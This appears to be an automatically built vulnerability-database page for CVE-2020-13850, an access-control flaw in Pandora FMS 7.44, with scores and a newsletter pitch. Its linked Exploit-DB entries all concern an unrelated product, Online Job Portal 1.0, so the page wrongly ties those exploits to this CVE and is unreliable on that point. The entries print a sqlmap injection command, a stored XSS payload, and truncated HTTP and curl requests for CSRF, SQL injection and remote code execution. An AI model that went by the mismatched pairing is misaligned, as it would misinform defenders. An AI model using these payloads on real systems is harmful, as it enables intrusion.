CVE-2020-13850
published 2020-06-11CVE-2020-13850: Artica Pandora FMS 7.44 has inadequate access controls on a web folder.
PriorityP341high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EPSS
2.17%
80.0th percentile
Artica Pandora FMS 7.44 has inadequate access controls on a web folder.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pandorafms | pandora_fms | — | — |
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Online Job Portal 1.0 - 'userid' SQL Injection
exploitdb·2020-10-30
Online Job Portal 1.0 - 'userid' SQL Injection
Online Job Portal 1.0 - 'userid' SQL Injection
---
# Exploit Title: Online Job Portal 1.0 - 'userid' SQL Injection
# Google Dork: N/A
# Date: 2020/10/28
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A
# Vulnerable URL: http://localhost/jobportal/Admin/EditUser.php?UserId='
Proof of Concept:
1. See vulnerable url.
2. Open sqlmap and use " sqlmap -u "http://localhost/jobportal/Admin/EditUser.php?UserId='" --dbs " command.
Exploit-DB
Online Job Portal 1.0 - Cross Site Scripting (Stored)
exploitdb·2020-10-19
Online Job Portal 1.0 - Cross Site Scripting (Stored)
Online Job Portal 1.0 - Cross Site Scripting (Stored)
---
# Exploit Title: Online Job Portal 1.0 Cross Site Scripting (Stored)
# Google Dork: N/A
# Date: 2020/10/17
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A
Proof of Concept:
1 - Open URL http://localhost/jobportal/Employer/ManageJob.php
2 - Fill in the blanks with this payload: ">alert (1)
3 - And click submit button.
Exploit-DB
Online Job Portal 1.0 - Cross Site Request Forgery (Add User)
exploitdb·2020-02-06
Online Job Portal 1.0 - Cross Site Request Forgery (Add User)
Online Job Portal 1.0 - Cross Site Request Forgery (Add User)
---
# Exploit Title: Online Job Portal 1.0 - Cross Site Request Forgery (Add User)
# Dork: N/A
# Date: 2020-02-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: Linux
# CVE: N/A
# POC:
# 1)
# Add User..
#
POST /admin/user/controller.php?action=add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application
Exploit-DB
Online Job Portal 1.0 - 'user_email' SQL Injection
exploitdb·2020-02-06
Online Job Portal 1.0 - 'user_email' SQL Injection
Online Job Portal 1.0 - 'user_email' SQL Injection
---
# Exploit Title: Online Job Portal 1.0 - 'user_email' SQL Injection
# Dork: N/A
# Date: 2020-02-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: Linux
# CVE: N/A
# POC:
# 1)
#
curl -i -s -k -X $'POST' \
-H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -
Exploit-DB
Online Job Portal 1.0 - Remote Code Execution
exploitdb·2020-02-06
Online Job Portal 1.0 - Remote Code Execution
Online Job Portal 1.0 - Remote Code Execution
---
# Exploit Title: Online Job Portal 1.0 - Remote Code Execution
# Dork: N/A
# Date: 2020-02-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: Linux
# CVE: N/A
# POC:
# 1)
#
curl -i -s -k -X $'POST' \
-H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=----------------
No writeups or analysis indexed.
2020-06-11
Published